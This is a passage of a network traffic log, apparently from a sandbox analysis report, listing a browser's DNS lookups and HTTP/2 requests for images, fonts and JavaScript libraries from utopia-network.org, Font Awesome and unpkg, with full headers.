                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/api__bg_mobile.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/api__bg_mobile.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 241
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/footer__bg_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/footer__bg_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 41258
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/reason__bg_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/reason__bg_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 171410
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Inter-Regular.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Inter-Regular.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 171300
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Inter-Medium.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Inter-Medium.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 180144
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/icons/video-play.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/icons/video-play.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 6151
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/reason__bg.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/reason__bg.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 682154
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/reason__globe.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/reason__globe.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 372430
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/footer__bg.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/footer__bg.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 94784
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          kit.fontawesome.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          kit.fontawesome.com
                                                                                          IN A
                                                                                          Response
                                                                                          kit.fontawesome.com
                                                                                          IN CNAME
                                                                                          kit.fontawesome.com.cdn.cloudflare.net
                                                                                          kit.fontawesome.com.cdn.cloudflare.net
                                                                                          IN A
                                                                                          104.18.22.52
                                                                                          kit.fontawesome.com.cdn.cloudflare.net
                                                                                          IN A
                                                                                          104.18.23.52
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://kit.fontawesome.com/55e0136003.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.18.22.52:443
                                                                                          Request
                                                                                          GET /55e0136003.js HTTP/2.0
                                                                                          host: kit.fontawesome.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          content-type: text/javascript
                                                                                          access-control-allow-headers: accept, accept-langauge, content-language, content-type, fa-kit-token
                                                                                          access-control-allow-methods: GET, OPTIONS
                                                                                          access-control-allow-origin: *
                                                                                          access-control-max-age: 3000
                                                                                          cache-control: max-age=60, public, must-revalidate
                                                                                          strict-transport-security: max-age=31536000; preload
                                                                                          vary: origin, accept-encoding, access-control-request-headers, access-control-request-method
                                                                                          x-request-id: FozBQERdOTgFNF5Zu_lB
                                                                                          cf-cache-status: REVALIDATED
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53263db63d47b-HAM
                                                                                          content-encoding: gzip
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          unpkg.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          Response
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.126.175
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.125.175
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.122.175
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.124.175
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.123.175
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://unpkg.com/tippy.js@6/dist/tippy-bundle.umd.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.126.175:443
                                                                                          Request
                                                                                          GET /tippy.js@6/dist/tippy-bundle.umd.js HTTP/2.0
                                                                                          host: unpkg.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: text/plain; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, s-maxage=600, max-age=60
                                                                                          location: /tippy.js@6.3.1/dist/tippy-bundle.umd.js
                                                                                          vary: Accept, Accept-Encoding
                                                                                          via: 1.1 fly.io
                                                                                          fly-request-id: 01FA6QYKSJTP65ANTBCQCFC30X
                                                                                          cf-cache-status: HIT
                                                                                          age: 356
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-content-type-options: nosniff
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53266eb0c1ec2-AMS
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://unpkg.com/@popperjs/core@2/dist/umd/popper.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.126.175:443
                                                                                          Request
                                                                                          GET /@popperjs/core@2/dist/umd/popper.min.js HTTP/2.0
                                                                                          host: unpkg.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: text/plain; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, s-maxage=600, max-age=60
                                                                                          location: /@popperjs/core@2.9.2/dist/umd/popper.min.js
                                                                                          vary: Accept, Accept-Encoding
                                                                                          via: 1.1 fly.io
                                                                                          fly-request-id: 01FA6R08F20F753JYPHMQK0T9Y
                                                                                          cf-cache-status: HIT
                                                                                          age: 302
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-content-type-options: nosniff
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53266eb0d1ec2-AMS
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://unpkg.com/@popperjs/core@2.9.2/dist/umd/popper.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.126.175:443
                                                                                          Request
                                                                                          GET /@popperjs/core@2.9.2/dist/umd/popper.min.js HTTP/2.0
                                                                                          host: unpkg.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: application/javascript; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, max-age=31536000
                                                                                          last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                          etag: W/"48a2-jut79x6Kl4uCoaGYAV8U1z0upZI"
                                                                                          via: 1.1 fly.io
                                                                                          fly-request-id: 01F3YK2Z4VP85T0YA6QPXNDT71
                                                                                          cf-cache-status: HIT
                                                                                          age: 6716342
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          vary: Accept-Encoding
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-content-type-options: nosniff
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c532672b591ec2-AMS
                                                                                          content-encoding: br
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://unpkg.com/tippy.js@6.3.1/dist/tippy-bundle.umd.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.126.175:443
                                                                                          Request
                                                                                          GET /tippy.js@6.3.1/dist/tippy-bundle.umd.js HTTP/2.0
                                                                                          host: unpkg.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: application/javascript; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, max-age=31536000
                                                                                          last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                          etag: W/"130c6-eb9u11+OJfe2374TXJky5XdFYJ8"
                                                                                          via: 1.1 fly.io
                                                                                          fly-request-id: 01F3YK3ACY3WVND3AQR0QQYP6S
                                                                                          cf-cache-status: HIT
                                                                                          age: 6716331
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          vary: Accept-Encoding
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-content-type-options: nosniff
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53267abea1ec2-AMS
                                                                                          content-encoding: br
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/css/free.min.css?token=55e0136003
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/css/free.min.css?token=55e0136003 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          origin: https://www.utopia-network.org
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: text/css
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:23:57 GMT
                                                                                          etag: W/"22be82a519ceafc43258d8f58a37fcf5"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          vary: Accept-Encoding
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 4b3bed207ec72204ebc89ae818e573ef.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: 28XQZoeQfVkj_-pLBLx5cgiPi81P6PP08MZOOyc6aac7O5j4oRMB3Q==
                                                                                          age: 987342
                                                                                          cf-cache-status: HIT
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jXMn67zHwN9zN1hYESU7ftrBMWMT0pZeZajfkMGwzPlV3vdj4Q%2B1TByF%2BjL%2B4cG1i7n9wwIxz9K1a1QWiZobujcw50mrLFTCHk5wr9t3N0xrVCCmxsN8rUcUJnptHQ1adaI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326949810c81-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/css/free-v4-shims.min.css?token=55e0136003
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/css/free-v4-shims.min.css?token=55e0136003 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          origin: https://www.utopia-network.org
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: text/css
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:23:57 GMT
                                                                                          etag: W/"8a99ce81ec2f89fbca03f2c8cf1a3679"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          vary: Accept-Encoding
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 eec12a22159207af63748eccf10799b3.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: lwnZEStqx5kEsi4i70dYs7D6FLVQWid6koMFeQIbYPYrPsZXGolP_w==
                                                                                          age: 987342
                                                                                          cf-cache-status: HIT
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=7lyK0Bs%2Bx7Hxxac1BdifbXJQRnqaNb2ox5Lz8KubOwP%2FxVfIDTrYr%2Bc26vn6UMYsPeHwqEZhKrcCwn4pfMPGFYUfmf8PPm9Ni6fr%2B0XTUfTAht6Ca4VDY%2BNSx8Ea62saUCU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326949740c81-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/css/free-v4-font-face.min.css?token=55e0136003
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/css/free-v4-font-face.min.css?token=55e0136003 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          origin: https://www.utopia-network.org
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: text/css
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:23:57 GMT
                                                                                          etag: W/"390b4210e10c744c3c597500bcf0b31a"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          vary: Accept-Encoding
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 bb1fd0922e473ba97ff6a00f6c71141b.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: 3RAjBo6_4kkbckMe1W47bit_2srWrIzvbo27uH2mHs1-tZmQEi38wQ==
                                                                                          age: 987342
                                                                                          cf-cache-status: HIT
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=3ORUCv9Mqs4qAfFxgCVvZVBr%2B04UIMiTXZtgEsvUMnjCLqt0AfYQzvzPtV1ZUjtNKPexlq8K68ZN79GKedct4U19ks6Q%2BHUW1WhlUPl6OawGDC%2Fo%2BPqxU8TLgDdZNGGEGWE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326949730c81-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/webfonts/free-fa-brands-400.woff2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/webfonts/free-fa-brands-400.woff2 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: font/woff2
                                                                                          content-length: 76732
                                                                                          last-modified: Wed, 17 Mar 2021 02:28:17 GMT
                                                                                          etag: "f226ebb9ea1cc388279081a65b6a7bb0"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          access-control-max-age: 3000
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 4b28b963946514dd2cf9a90f74a8034a.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: ek3btQ31TlBwzVFvgPhCBnPG1HmaenFstBuY1oq66NyhyCc4c2LgTA==
                                                                                          age: 987341
                                                                                          cf-cache-status: HIT
                                                                                          accept-ranges: bytes
